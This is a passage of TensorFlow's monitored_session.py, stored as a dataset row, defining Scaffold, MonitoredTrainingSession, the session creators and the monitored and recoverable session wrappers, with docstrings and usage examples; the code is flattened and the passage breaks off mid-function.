repo_name (string, 6-100 chars) | path (string, 4-294 chars) | copies (string, 1-5 chars) | size (string, 4-6 chars) | content (string, 606-896k chars) | license (15 classes)
---|---|---|---|---|---
ZhangXinNan/tensorflow | tensorflow/python/training/monitored_session.py | 11 | 48948 |
# pylint: disable=g-bad-file-header
# Copyright 2016 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""A wrapper of Session API which runs hooks."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import abc
import sys
import six
from tensorflow.core.protobuf import config_pb2
from tensorflow.python.framework import errors
from tensorflow.python.framework import ops
from tensorflow.python.ops import array_ops
from tensorflow.python.ops import control_flow_ops
from tensorflow.python.ops import lookup_ops
from tensorflow.python.ops import resources
from tensorflow.python.ops import variables
from tensorflow.python.platform import tf_logging as logging
from tensorflow.python.summary import summary
from tensorflow.python.training import basic_session_run_hooks
from tensorflow.python.training import coordinator
from tensorflow.python.training import queue_runner
from tensorflow.python.training import saver as training_saver
from tensorflow.python.training import session_manager as sm
from tensorflow.python.training import session_run_hook
from tensorflow.python.util import function_utils
from tensorflow.python.util.tf_export import tf_export
# The list of exceptions that we should recover from. Exceptions not in this
# list may terminate the job.
_PREEMPTION_ERRORS = (errors.AbortedError, errors.UnavailableError)
# Value that indicates no value was provided.
USE_DEFAULT = object()
@tf_export('train.Scaffold')
class Scaffold(object):
"""Structure to create or gather pieces commonly needed to train a model.
When you build a model for training you usually need ops to initialize
variables, a `Saver` to checkpoint them, an op to collect summaries for
the visualizer, and so on.
Various libraries built on top of the core TensorFlow library take care of
creating some or all of these pieces and storing them in well known
collections in the graph. The `Scaffold` class helps pick these pieces from
the graph collections, creating and adding them to the collections if needed.
If you call the scaffold constructor without any arguments, it will pick
pieces from the collections, creating default ones if needed when
`scaffold.finalize()` is called. You can pass arguments to the constructor to
provide your own pieces. Pieces that you pass to the constructor are not
added to the graph collections.
The following pieces are directly accessible as attributes of the `Scaffold`
object:
* `saver`: A `tf.train.Saver` object taking care of saving the variables.
Picked from and stored into the `SAVERS` collection in the graph by default.
* `init_op`: An op to run to initialize the variables. Picked from and
stored into the `INIT_OP` collection in the graph by default.
* `ready_op`: An op to verify that the variables are initialized. Picked
from and stored into the `READY_OP` collection in the graph by default.
* `ready_for_local_init_op`: An op to verify that global state has been
initialized and it is alright to run `local_init_op`. Picked from and
stored into the `READY_FOR_LOCAL_INIT_OP` collection in the graph by
default. This is needed when the initialization of local variables depends
on the values of global variables.
* `local_init_op`: An op to initialize the local variables. Picked
from and stored into the `LOCAL_INIT_OP` collection in the graph by default.
* `summary_op`: An op to run and merge the summaries in the graph. Picked
from and stored into the `SUMMARY_OP` collection in the graph by default.
* `global_step`: A tensor containing the global step counter. Picked
from and stored into the `GLOBAL_STEP` collection in the graph by default.
You can also pass the following additional pieces to the constructor:
* `init_feed_dict`: A session feed dictionary that should be used when
running the init op.
* `init_fn`: A callable to run after the init op to perform additional
initializations. The callable will be called as
`init_fn(scaffold, session)`.
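For illustration, here is a minimal sketch of supplying a custom `init_fn`
through a `Scaffold`; the variable, placeholder, and feed names are made up
for the example and are not part of the API:
```python
import numpy as np
import tensorflow as tf

with tf.Graph().as_default():
  embedding = tf.get_variable('embedding', shape=[4, 2])
  value_feed = tf.placeholder(tf.float32, shape=[4, 2])
  assign_op = embedding.assign(value_feed)

  def load_pretrained(scaffold, session):
    # Runs once, after the init op, with access to the raw session.
    session.run(assign_op, {value_feed: np.ones([4, 2], np.float32)})

  scaffold = tf.train.Scaffold(init_fn=load_pretrained)
  with tf.train.MonitoredSession(
      session_creator=tf.train.ChiefSessionCreator(scaffold=scaffold)) as sess:
    print(sess.run(embedding))
```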
"""
def __init__(self,
init_op=None,
init_feed_dict=None,
init_fn=None,
ready_op=None,
ready_for_local_init_op=None,
local_init_op=None,
summary_op=None,
saver=None,
copy_from_scaffold=None):
"""Create a scaffold.
Args:
init_op: Optional op for initializing variables.
init_feed_dict: Optional session feed dictionary to use when running the
init_op.
init_fn: Optional function to use to initialize the model after running
the init_op. Will be called as `init_fn(scaffold, session)`.
ready_op: Optional op to verify that the variables are initialized. Must
return an empty 1D string tensor when the variables are initialized, or
a non-empty 1D string tensor listing the names of the non-initialized
variables.
ready_for_local_init_op: Optional op to verify that the global variables
are initialized and `local_init_op` can be run. Must return an empty
1D string tensor when the global variables are initialized, or a
non-empty 1D string tensor listing the names of the non-initialized
global variables.
local_init_op: Optional op to initialize local variables.
summary_op: Optional op to gather all summaries. Must return a scalar
string tensor containing a serialized `Summary` proto.
saver: Optional `tf.train.Saver` object to use to save and restore
variables.
copy_from_scaffold: Optional scaffold object to copy fields from. Its
fields will be overwritten by the provided fields in this function.
"""
if copy_from_scaffold is not None:
if not isinstance(copy_from_scaffold, Scaffold):
raise TypeError('copy_from_scaffold is not a Scaffold instance.')
# We need `coalesce` since a Tensor is not converted to bool automatically,
# so the common idiom of (a or b) does not work.
coalesce = lambda a, b: a if a is not None else b
init_op = coalesce(init_op, copy_from_scaffold.init_op)
init_feed_dict = coalesce(init_feed_dict,
copy_from_scaffold.init_feed_dict)
# Use the original init_fn provided by the user to init the new Scaffold.
init_fn = coalesce(init_fn, copy_from_scaffold._user_init_fn) # pylint: disable=protected-access
ready_op = coalesce(ready_op, copy_from_scaffold.ready_op)
ready_for_local_init_op = coalesce(
ready_for_local_init_op, copy_from_scaffold.ready_for_local_init_op)
local_init_op = coalesce(local_init_op, copy_from_scaffold.local_init_op)
summary_op = coalesce(summary_op, copy_from_scaffold.summary_op)
saver = coalesce(saver, copy_from_scaffold.saver)
# NOTE(touts): modifying the init function to be passed the scaffold is a
# hack to make it easy to find the saver. Is there a better way?
self._user_init_fn = init_fn
if init_fn:
self._init_fn = lambda sess: init_fn(self, sess)
else:
self._init_fn = None
self._init_op = init_op
self._init_feed_dict = init_feed_dict
self._ready_op = ready_op
self._ready_for_local_init_op = ready_for_local_init_op
self._local_init_op = local_init_op
self._summary_op = summary_op
self._saver = saver
def finalize(self):
"""Creates operations if needed and finalizes the graph."""
if self._init_op is None:
def default_init_op():
return control_flow_ops.group(
variables.global_variables_initializer(),
resources.initialize_resources(resources.shared_resources()))
self._init_op = Scaffold.get_or_default(
'init_op',
ops.GraphKeys.INIT_OP,
default_init_op)
if self._ready_op is None:
def default_ready_op():
return array_ops.concat([
variables.report_uninitialized_variables(),
resources.report_uninitialized_resources()
], 0)
self._ready_op = Scaffold.get_or_default(
'ready_op', ops.GraphKeys.READY_OP,
default_ready_op)
if self._ready_for_local_init_op is None:
def default_ready_for_local_init_op():
return variables.report_uninitialized_variables(
variables.global_variables())
self._ready_for_local_init_op = Scaffold.get_or_default(
'ready_for_local_init_op', ops.GraphKeys.READY_FOR_LOCAL_INIT_OP,
default_ready_for_local_init_op)
if self._local_init_op is None:
self._local_init_op = Scaffold.get_or_default(
'local_init_op', ops.GraphKeys.LOCAL_INIT_OP,
Scaffold.default_local_init_op)
if self._summary_op is None:
self._summary_op = Scaffold.get_or_default('summary_op',
ops.GraphKeys.SUMMARY_OP,
summary.merge_all)
# pylint: disable=g-long-lambda
if self._saver is None:
self._saver = training_saver._get_saver_or_default() # pylint: disable=protected-access
# pylint: enable=g-long-lambda
self._saver.build()
ops.get_default_graph().finalize()
logging.info('Graph was finalized.')
return self
@property
def init_fn(self):
return self._init_fn
@property
def init_op(self):
return self._init_op
@property
def ready_op(self):
return self._ready_op
@property
def ready_for_local_init_op(self):
return self._ready_for_local_init_op
@property
def local_init_op(self):
return self._local_init_op
@property
def summary_op(self):
return self._summary_op
@property
def saver(self):
return self._saver
@property
def init_feed_dict(self):
return self._init_feed_dict
@staticmethod
def get_or_default(arg_name, collection_key, default_constructor):
"""Get from cache or create a default operation."""
elements = ops.get_collection(collection_key)
if elements:
if len(elements) > 1:
  raise RuntimeError(
      'More than one item in the collection "%s". '
      'Please indicate which one to use by passing it to '
      'the tf.Scaffold constructor as: '
      'tf.Scaffold(%s=item to use)' % (collection_key, arg_name))
return elements[0]
op = default_constructor()
if op is not None:
ops.add_to_collection(collection_key, op)
return op
@staticmethod
def default_local_init_op():
"""Returns an op that groups the default local init ops.
This op is used during session initialization when a Scaffold is
initialized without specifying the local_init_op arg. It includes
`tf.local_variables_initializer`, `tf.tables_initializer`, and also
initializes local session resources.
Returns:
The default Scaffold local init op.
"""
return control_flow_ops.group(
variables.local_variables_initializer(),
lookup_ops.tables_initializer(),
resources.initialize_resources(resources.local_resources()))
@tf_export('train.MonitoredTrainingSession')
def MonitoredTrainingSession(master='', # pylint: disable=invalid-name
is_chief=True,
checkpoint_dir=None,
scaffold=None,
hooks=None,
chief_only_hooks=None,
save_checkpoint_secs=USE_DEFAULT,
save_summaries_steps=USE_DEFAULT,
save_summaries_secs=USE_DEFAULT,
config=None,
stop_grace_period_secs=120,
log_step_count_steps=100,
max_wait_secs=7200,
save_checkpoint_steps=USE_DEFAULT,
summary_dir=None):
"""Creates a `MonitoredSession` for training.
For a chief, this utility sets proper session initializer/restorer. It also
creates hooks related to checkpoint and summary saving. For workers, this
utility sets proper session creator which waits for the chief to
initialize/restore. Please check `tf.train.MonitoredSession` for more
information.
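A minimal usage sketch (the step-increment op below stands in for a real
training op, and the checkpoint directory is just an example path):
```python
import tensorflow as tf

with tf.Graph().as_default():
  global_step = tf.train.get_or_create_global_step()
  train_op = tf.assign_add(global_step, 1)
  with tf.train.MonitoredTrainingSession(
      checkpoint_dir='/tmp/example_train_dir',
      hooks=[tf.train.StopAtStepHook(last_step=5)]) as sess:
    while not sess.should_stop():
      sess.run(train_op)
```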
Args:
master: `String` the TensorFlow master to use.
is_chief: If `True`, it will take care of initialization and recovery of the
underlying TensorFlow session. If `False`, it will wait on a chief to
initialize or recover the TensorFlow session.
checkpoint_dir: A string. Optional path to a directory where to restore
variables.
scaffold: A `Scaffold` used for gathering or building supportive ops. If
not specified, a default one is created. It's used to finalize the graph.
hooks: Optional list of `SessionRunHook` objects.
chief_only_hooks: list of `SessionRunHook` objects. Activate these hooks if
`is_chief==True`, ignore otherwise.
save_checkpoint_secs: The frequency, in seconds, that a checkpoint is saved
using a default checkpoint saver. If both `save_checkpoint_steps` and
`save_checkpoint_secs` are set to `None`, then the default checkpoint
saver isn't used. If both are provided, then only `save_checkpoint_secs`
is used. Default 600.
save_summaries_steps: The frequency, in number of global steps, that the
summaries are written to disk using a default summary saver. If both
`save_summaries_steps` and `save_summaries_secs` are set to `None`, then
the default summary saver isn't used. Default 100.
save_summaries_secs: The frequency, in secs, that the summaries are written
to disk using a default summary saver. If both `save_summaries_steps` and
`save_summaries_secs` are set to `None`, then the default summary saver
isn't used. Default not enabled.
config: An instance of `tf.ConfigProto` proto used to configure the session.
It's the `config` argument of the constructor of `tf.Session`.
stop_grace_period_secs: Number of seconds given to threads to stop after
`close()` has been called.
log_step_count_steps: The frequency, in number of global steps, that the
global step/sec is logged.
max_wait_secs: Maximum time workers should wait for the session to
become available. This should be kept relatively short to help detect
incorrect code, but sometimes may need to be increased if the chief takes
a while to start up.
save_checkpoint_steps: The frequency, in number of global steps, that a
checkpoint is saved using a default checkpoint saver. If both
`save_checkpoint_steps` and `save_checkpoint_secs` are set to `None`, then
the default checkpoint saver isn't used. If both are provided, then only
`save_checkpoint_secs` is used. Default not enabled.
summary_dir: A string. Optional path to a directory where to
save summaries. If None, checkpoint_dir is used instead.
Returns:
A `MonitoredSession` object.
"""
if save_summaries_steps == USE_DEFAULT and save_summaries_secs == USE_DEFAULT:
save_summaries_steps = 100
save_summaries_secs = None
elif save_summaries_secs == USE_DEFAULT:
save_summaries_secs = None
elif save_summaries_steps == USE_DEFAULT:
save_summaries_steps = None
if (save_checkpoint_steps == USE_DEFAULT and
save_checkpoint_secs == USE_DEFAULT):
save_checkpoint_steps = None
save_checkpoint_secs = 600
elif save_checkpoint_secs == USE_DEFAULT:
save_checkpoint_secs = None
elif save_checkpoint_steps == USE_DEFAULT:
save_checkpoint_steps = None
scaffold = scaffold or Scaffold()
if not is_chief:
session_creator = WorkerSessionCreator(
scaffold=scaffold,
master=master,
config=config,
max_wait_secs=max_wait_secs)
return MonitoredSession(session_creator=session_creator, hooks=hooks or [],
stop_grace_period_secs=stop_grace_period_secs)
all_hooks = []
if chief_only_hooks:
all_hooks.extend(chief_only_hooks)
session_creator = ChiefSessionCreator(
scaffold=scaffold,
checkpoint_dir=checkpoint_dir,
master=master,
config=config)
summary_dir = summary_dir or checkpoint_dir
if summary_dir:
if log_step_count_steps and log_step_count_steps > 0:
all_hooks.append(
basic_session_run_hooks.StepCounterHook(
output_dir=summary_dir, every_n_steps=log_step_count_steps))
if (save_summaries_steps and save_summaries_steps > 0) or (
save_summaries_secs and save_summaries_secs > 0):
all_hooks.append(basic_session_run_hooks.SummarySaverHook(
scaffold=scaffold,
save_steps=save_summaries_steps,
save_secs=save_summaries_secs,
output_dir=summary_dir))
if checkpoint_dir:
if (save_checkpoint_secs and save_checkpoint_secs > 0) or (
save_checkpoint_steps and save_checkpoint_steps > 0):
all_hooks.append(basic_session_run_hooks.CheckpointSaverHook(
checkpoint_dir,
save_steps=save_checkpoint_steps,
save_secs=save_checkpoint_secs,
scaffold=scaffold))
if hooks:
all_hooks.extend(hooks)
return MonitoredSession(session_creator=session_creator, hooks=all_hooks,
stop_grace_period_secs=stop_grace_period_secs)
@tf_export('train.SessionCreator')
class SessionCreator(object):
"""A factory for tf.Session."""
@abc.abstractmethod
def create_session(self):
raise NotImplementedError(
'create_session is not implemented for {}.'.format(self))
@tf_export('train.ChiefSessionCreator')
class ChiefSessionCreator(SessionCreator):
"""Creates a tf.Session for a chief."""
def __init__(self,
scaffold=None,
master='',
config=None,
checkpoint_dir=None,
checkpoint_filename_with_path=None):
"""Initializes a chief session creator.
Args:
scaffold: A `Scaffold` used for gathering or building supportive ops. If
not specified, a default one is created. It's used to finalize the graph.
master: `String` representation of the TensorFlow master to use.
config: `ConfigProto` proto used to configure the session.
checkpoint_dir: A string. Optional path to a directory where to restore
variables.
checkpoint_filename_with_path: Full file name path to the checkpoint file.
"""
self._checkpoint_dir = checkpoint_dir
self._checkpoint_filename_with_path = checkpoint_filename_with_path
self._scaffold = scaffold or Scaffold()
self._session_manager = None
self._master = master
self._config = config
def _get_session_manager(self):
if self._session_manager:
return self._session_manager
self._session_manager = sm.SessionManager(
local_init_op=self._scaffold.local_init_op,
ready_op=self._scaffold.ready_op,
ready_for_local_init_op=self._scaffold.ready_for_local_init_op,
graph=ops.get_default_graph())
return self._session_manager
def create_session(self):
self._scaffold.finalize()
return self._get_session_manager().prepare_session(
self._master,
saver=self._scaffold.saver,
checkpoint_dir=self._checkpoint_dir,
checkpoint_filename_with_path=self._checkpoint_filename_with_path,
config=self._config,
init_op=self._scaffold.init_op,
init_feed_dict=self._scaffold.init_feed_dict,
init_fn=self._scaffold.init_fn)
@tf_export('train.WorkerSessionCreator')
class WorkerSessionCreator(SessionCreator):
"""Creates a tf.Session for a worker."""
def __init__(self,
scaffold=None,
master='',
config=None,
max_wait_secs=30 * 60):
"""Initializes a worker session creator.
Args:
scaffold: A `Scaffold` used for gathering or building supportive ops. If
not specified, a default one is created. It's used to finalize the graph.
master: `String` representation of the TensorFlow master to use.
config: `ConfigProto` proto used to configure the session.
max_wait_secs: Maximum time to wait for the session to become available.
"""
self._scaffold = scaffold or Scaffold()
self._session_manager = None
self._master = master
self._config = config
self._max_wait_secs = max_wait_secs
def _get_session_manager(self):
if self._session_manager:
return self._session_manager
self._session_manager = sm.SessionManager(
local_init_op=self._scaffold.local_init_op,
ready_op=self._scaffold.ready_op,
ready_for_local_init_op=self._scaffold.ready_for_local_init_op,
graph=ops.get_default_graph())
return self._session_manager
def create_session(self):
self._scaffold.finalize()
return self._get_session_manager().wait_for_session(
self._master, config=self._config,
max_wait_secs=self._max_wait_secs
)
class _MonitoredSession(object):
"""See `MonitoredSession` or `SingularMonitoredSession`."""
def __init__(self, session_creator, hooks, should_recover,
stop_grace_period_secs=120):
"""Sets up a Monitored or Hooked Session.
Args:
session_creator: A factory object to create session. Typically a
`ChiefSessionCreator` or a `WorkerSessionCreator`.
hooks: An iterable of `SessionRunHook` objects.
should_recover: A bool. Indicates whether to recover from `AbortedError`
and `UnavailableError` or not.
stop_grace_period_secs: Number of seconds given to threads to stop after
`close()` has been called.
"""
self._graph_was_finalized = ops.get_default_graph().finalized
self._hooks = hooks or []
for h in self._hooks:
h.begin()
# Create the session.
self._coordinated_creator = self._CoordinatedSessionCreator(
session_creator=session_creator or ChiefSessionCreator(),
hooks=self._hooks,
stop_grace_period_secs=stop_grace_period_secs)
if should_recover:
self._sess = _RecoverableSession(self._coordinated_creator)
else:
self._sess = self._coordinated_creator.create_session()
@property
def graph(self):
"""The graph that was launched in this session."""
if self._tf_sess() is None:
return None
return self._tf_sess().graph
def run(self, fetches, feed_dict=None, options=None, run_metadata=None):
"""Run ops in the monitored session.
This method is completely compatible with the `tf.Session.run()` method.
Args:
fetches: Same as `tf.Session.run()`.
feed_dict: Same as `tf.Session.run()`.
options: Same as `tf.Session.run()`.
run_metadata: Same as `tf.Session.run()`.
Returns:
Same as `tf.Session.run()`.
"""
return self._sess.run(fetches,
feed_dict=feed_dict,
options=options,
run_metadata=run_metadata)
def run_step_fn(self, step_fn):
"""Run ops using a step function.
Args:
step_fn: A function or a method with a single argument of type
`StepContext`. The function may use methods of the argument to
perform computations with access to a raw session.
The returned value of the `step_fn` will be returned from `run_step_fn`,
unless a stop is requested. In that case, the next `should_stop` call
will return True.
Example usage:
```python
with tf.Graph().as_default():
c = tf.placeholder(tf.float32)
v = tf.add(c, 4.0)
w = tf.add(c, 0.5)
def step_fn(step_context):
a = step_context.session.run(fetches=v, feed_dict={c: 0.5})
if a <= 4.5:
step_context.request_stop()
return step_context.run_with_hooks(fetches=w, feed_dict={c: 0.1})
with tf.train.MonitoredSession() as session:
while not session.should_stop():
a = session.run_step_fn(step_fn)
```
Hooks interact with the `run_with_hooks()` call inside the `step_fn`
as they do with a `MonitoredSession.run` call.
Returns:
The value returned by `step_fn`.
Raises:
StopIteration: if `step_fn` has called `request_stop()`. It may be
caught by `with tf.train.MonitoredSession()` to close the session.
ValueError: if `step_fn` doesn't have a single argument called
`step_context`. It may also optionally have `self` for cases when it
belongs to an object.
"""
step_fn_arguments = function_utils.fn_args(step_fn)
if step_fn_arguments != ('step_context',) and step_fn_arguments != (
'self',
'step_context',
):
raise ValueError(
'`step_fn` may either have one `step_context` argument, or'
' `self` and `step_context` arguments if it\'s an instance'
' method. Got {} instead.'.format(step_fn_arguments))
# `self._sess` is either `_RecoverableSession` or a `_CoordinatedSession`.
# Setting `run_with_hooks` to `None` will cause `run_with_hooks` to be
# `_CoordinatedSession.run` downstream in either case. This allows
# `_PREEMPTION_ERRORS` to propagate from within `step_fn` to
# `_RecoverableSession.run_step_fn`.
return self._sess.run_step_fn(step_fn, self._tf_sess(), run_with_hooks=None)
class StepContext(object):
"""Control flow instrument for the `step_fn` from `run_step_fn()`.
Users of `step_fn` may perform `run()` calls without running hooks
by accessing the `session`. A `run()` call with hooks may be performed
using `run_with_hooks()`. Computation flow can be interrupted using
`request_stop()`.
"""
def __init__(self, session, run_with_hooks_fn):
"""Initializes the `step_context` argument for a `step_fn` invocation.
Args:
session: An instance of `tf.Session`.
run_with_hooks_fn: A function for running fetches and hooks.
"""
self._session = session
self._run_with_hooks_fn = run_with_hooks_fn
@property
def session(self):
return self._session
def run_with_hooks(self, *args, **kwargs):
"""Same as `MonitoredSession.run`. Accepts the same arguments."""
return self._run_with_hooks_fn(*args, **kwargs)
def request_stop(self):
"""Exit the training loop by causing `should_stop()` to return `True`.
Causes `step_fn` to exit by raising an exception.
Raises:
StopIteration
"""
raise StopIteration('step_fn has requested the iterations to stop.')
def should_stop(self):
return self._sess is None or self._sess.should_stop()
def close(self):
self._close_internal()
def __enter__(self):
return self
def __exit__(self, exception_type, exception_value, traceback):
if exception_type in [errors.OutOfRangeError, StopIteration]:
exception_type = None
self._close_internal(exception_type)
# __exit__ should return True to suppress an exception.
return exception_type is None
class _CoordinatedSessionCreator(SessionCreator):
"""Factory for the _RecoverableSession."""
def __init__(self, session_creator, hooks, stop_grace_period_secs):
self._session_creator = session_creator
self._hooks = hooks
self.coord = None
self.tf_sess = None
self._stop_grace_period_secs = stop_grace_period_secs
def create_session(self):
"""Creates a coordinated session."""
# Keep the tf_sess for unit testing.
self.tf_sess = self._session_creator.create_session()
# We don't want coordinator to suppress any exception.
self.coord = coordinator.Coordinator(clean_stop_exception_types=[])
queue_runner.start_queue_runners(sess=self.tf_sess, coord=self.coord)
# Inform the hooks that a new session has been created.
for hook in self._hooks:
hook.after_create_session(self.tf_sess, self.coord)
return _CoordinatedSession(
_HookedSession(self.tf_sess, self._hooks), self.coord,
self._stop_grace_period_secs)
def _close_internal(self, exception_type=None):
try:
if not exception_type:
for h in self._hooks:
h.end(self._coordinated_creator.tf_sess)
finally:
try:
if self._sess is None:
raise RuntimeError('Session is already closed.')
self._sess.close()
finally:
self._sess = None
self._coordinated_creator.tf_sess = None
self._coordinated_creator.coord = None
if not self._graph_was_finalized:
ops.get_default_graph()._unsafe_unfinalize() # pylint: disable=protected-access
def _is_closed(self):
"""Return True if the monitored session is closed. For tests only.
Returns:
A boolean.
"""
return self._coordinated_creator.tf_sess is None
def _tf_sess(self):
return self._coordinated_creator.tf_sess
@tf_export('train.MonitoredSession')
class MonitoredSession(_MonitoredSession):
"""Session-like object that handles initialization, recovery and hooks.
Example usage:
```python
saver_hook = CheckpointSaverHook(...)
summary_hook = SummarySaverHook(...)
with MonitoredSession(session_creator=ChiefSessionCreator(...),
hooks=[saver_hook, summary_hook]) as sess:
while not sess.should_stop():
sess.run(train_op)
```
Initialization: At creation time the monitored session does the following
things in the given order:
* calls `hook.begin()` for each given hook
* finalizes the graph via `scaffold.finalize()`
* creates the session
* initializes the model via initialization ops provided by `Scaffold`
* restores variables if a checkpoint exists
* launches queue runners
* calls `hook.after_create_session()`
Run: When `run()` is called, the monitored session does the following things:
* calls `hook.before_run()`
* calls TensorFlow `session.run()` with merged fetches and feed_dict
* calls `hook.after_run()`
* returns the result of the `session.run()` call requested by the user
* if `AbortedError` or `UnavailableError` occurs, it recovers or
reinitializes the session before executing the run() call again
Exit: At `close()`, the monitored session does the following things in order:
* calls `hook.end()`
* closes the queue runners and the session
* suppresses the `OutOfRange` error, which indicates that all inputs have
  been processed, if the monitored_session is used as a context
How to set `tf.Session` arguments:
* In most cases you can set session arguments as follows:
```python
MonitoredSession(
session_creator=ChiefSessionCreator(master=..., config=...))
```
* In distributed setting for a non-chief worker, you can use following:
```python
MonitoredSession(
session_creator=WorkerSessionCreator(master=..., config=...))
```
See `MonitoredTrainingSession` for an example usage based on chief or worker.
Note: This is not a `tf.Session`. For example, it cannot do the following:
* it cannot be set as default session.
* it cannot be sent to saver.save.
* it cannot be sent to tf.train.start_queue_runners.
Args:
session_creator: A factory object to create session. Typically a
`ChiefSessionCreator` which is the default one.
hooks: An iterable of `SessionRunHook` objects.
Returns:
A MonitoredSession object.
"""
def __init__(self, session_creator=None, hooks=None,
stop_grace_period_secs=120):
super(MonitoredSession, self).__init__(
session_creator, hooks, should_recover=True,
stop_grace_period_secs=stop_grace_period_secs)
@tf_export('train.SingularMonitoredSession')
class SingularMonitoredSession(_MonitoredSession):
"""Session-like object that handles initialization, restoring, and hooks.
Please note that this utility is not recommended for distributed settings.
For distributed settings, please use `tf.train.MonitoredSession`. The
differences between `MonitoredSession` and `SingularMonitoredSession` are:
* `MonitoredSession` handles `AbortedError` and `UnavailableError` for
distributed settings, but `SingularMonitoredSession` does not.
* `MonitoredSession` can be created in `chief` or `worker` modes.
`SingularMonitoredSession` is always created as `chief`.
* You can access the raw `tf.Session` object used by
`SingularMonitoredSession`, whereas in MonitoredSession the raw session is
private. This can be used:
- To `run` without hooks.
- To save and restore.
* All other functionality is identical.
Example usage:
```python
saver_hook = CheckpointSaverHook(...)
summary_hook = SummarySaverHook(...)
with SingularMonitoredSession(hooks=[saver_hook, summary_hook]) as sess:
while not sess.should_stop():
sess.run(train_op)
```
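As a sketch of the raw-session access mentioned above (the global step and
assign op simply give the `Saver` something to save; the checkpoint path is an
example):
```python
import tensorflow as tf

with tf.Graph().as_default():
  step = tf.train.get_or_create_global_step()
  train_op = tf.assign_add(step, 1)
  saver = tf.train.Saver()
  with tf.train.SingularMonitoredSession() as sess:
    sess.run(train_op)  # hooked run
    # The wrapper cannot be passed to Saver.save; hand it the raw session.
    saver.save(sess.raw_session(), '/tmp/example_ckpt')
```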
Initialization: At creation time the hooked session does the following things
in the given order:
* calls `hook.begin()` for each given hook
* finalizes the graph via `scaffold.finalize()`
* creates the session
* initializes the model via initialization ops provided by `Scaffold`
* restores variables if a checkpoint exists
* launches queue runners
Run: When `run()` is called, the hooked session does the following things:
* calls `hook.before_run()`
* calls TensorFlow `session.run()` with merged fetches and feed_dict
* calls `hook.after_run()`
* returns the result of the `session.run()` call requested by the user
Exit: At `close()`, the hooked session does the following things in order:
* calls `hook.end()`
* closes the queue runners and the session
* suppresses the `OutOfRange` error, which indicates that all inputs have
  been processed, if the `SingularMonitoredSession` is used as a context.
"""
def __init__(self,
hooks=None,
scaffold=None,
master='',
config=None,
checkpoint_dir=None,
stop_grace_period_secs=120,
checkpoint_filename_with_path=None):
"""Creates a SingularMonitoredSession.
Args:
hooks: An iterable of `SessionRunHook` objects.
scaffold: A `Scaffold` used for gathering or building supportive ops. If
not specified, a default one is created. It's used to finalize the graph.
master: `String` representation of the TensorFlow master to use.
config: `ConfigProto` proto used to configure the session.
checkpoint_dir: A string. Optional path to a directory where to restore
variables.
stop_grace_period_secs: Number of seconds given to threads to stop after
`close()` has been called.
checkpoint_filename_with_path: A string. Optional path to a checkpoint
file from which to restore variables.
"""
session_creator = ChiefSessionCreator(
scaffold=scaffold,
master=master,
config=config,
checkpoint_dir=checkpoint_dir,
checkpoint_filename_with_path=checkpoint_filename_with_path)
super(SingularMonitoredSession, self).__init__(
session_creator, hooks, should_recover=False,
stop_grace_period_secs=stop_grace_period_secs)
def raw_session(self):
"""Returns underlying `TensorFlow.Session` object."""
return self._tf_sess()
class _WrappedSession(object):
"""Wrapper around a `tf.Session`.
This wrapper is used as a base class for various session wrappers
that provide additional functionality such as monitoring, coordination,
and recovery.
In addition to the methods exported by `SessionInterface` the wrapper
provides a method to check for stop and never raises exceptions from
calls to `close()`.
"""
def __init__(self, sess):
"""Creates a `_WrappedSession`.
Args:
sess: A `tf.Session` or `_WrappedSession` object. The wrapped session.
"""
self._sess = sess
self._wrapped_is_stoppable = isinstance(self._sess, _WrappedSession)
@property
def graph(self):
return self._sess.graph
@property
def sess_str(self):
return self._sess.sess_str
def should_stop(self):
"""Return true if this session should not be used anymore.
Always return True if the session was closed.
Returns:
True if the session should stop, False otherwise.
"""
if self._check_stop():
return True
if self._sess:
return self._wrapped_is_stoppable and self._sess.should_stop()
return True
def _check_stop(self):
"""Hook for subclasses to provide their own stop condition.
Returns:
True if the session should stop, False otherwise.
"""
return False
def close(self):
if self._sess:
try:
self._sess.close()
except _PREEMPTION_ERRORS:
pass
finally:
self._sess = None
def run(self, *args, **kwargs):
return self._sess.run(*args, **kwargs)
def run_step_fn(self, step_fn, raw_session, run_with_hooks):
# `_RecoverableSession` sets `run_with_hooks` to `_CoordinatedSession.run`.
# It is `None` when called from `_CoordinatedSession`. In that case
# `self.run` is `_CoordinatedSession.run`.
run_with_hooks = run_with_hooks or self.run
return step_fn(_MonitoredSession.StepContext(raw_session, run_with_hooks))
class _RecoverableSession(_WrappedSession):
"""A wrapped session that recreates a session upon certain kinds of errors.
The constructor is passed a SessionCreator object, not a session.
Calls to `run()` are delegated to the wrapped session. If a call raises the
exception `tf.errors.AbortedError` or `tf.errors.UnavailableError`, the
wrapped session is closed, and a new one is created by calling the factory
again.
"""
def __init__(self, sess_creator):
"""Create a new `_RecoverableSession`.
The value returned by calling `sess_creator.create_session()` will be the
session wrapped by this recoverable session.
Args:
sess_creator: A `SessionCreator` to be wrapped by this recoverable session.
"""
self._sess_creator = sess_creator
_WrappedSession.__init__(self, self._create_session())
def _create_session(self):
while True:
try:
return self._sess_creator.create_session()
except _PREEMPTION_ERRORS as e:
logging.info('An error was raised while a session was being created. '
'This may be due to a preemption of a connected worker '
'or parameter server. A new session will be created. '
'Error: %s', e)
def _check_stop(self):
try:
if self._sess:
return self._sess._check_stop() # pylint: disable=protected-access
else:
return True
except _PREEMPTION_ERRORS as e:
logging.info('An error was raised while considering whether the '
'session is complete. This may be due to a preemption in '
'a connected worker or parameter server. The current '
'session will be closed and a new session will be '
'created. Error: %s', e)
self.close()
self._sess = self._create_session()
# Since we have just recreated the session, the overall computation should
# not stop:
return False
except Exception: # pylint: disable=broad-except
# `should_stop` should return True instead of raising an exception.
return True
def run(self, fetches, feed_dict=None, options=None, run_metadata=None):
while True:
try:
if not self._sess:
self._sess = self._create_session()
return self._sess.run(fetches,
feed_dict=feed_dict,
options=options,
run_metadata=run_metadata)
except _PREEMPTION_ERRORS as e:
logging.info('An error was raised. This may be due to a preemption in '
'a connected worker or parameter server. The current '
'session will be closed and a new session will be '
'created. Error: %s', e)
self.close()
self._sess = None
def run_step_fn(self, step_fn, raw_session, run_with_hooks):
while True:
try:
if not self._sess:
self._sess = self._create_session()
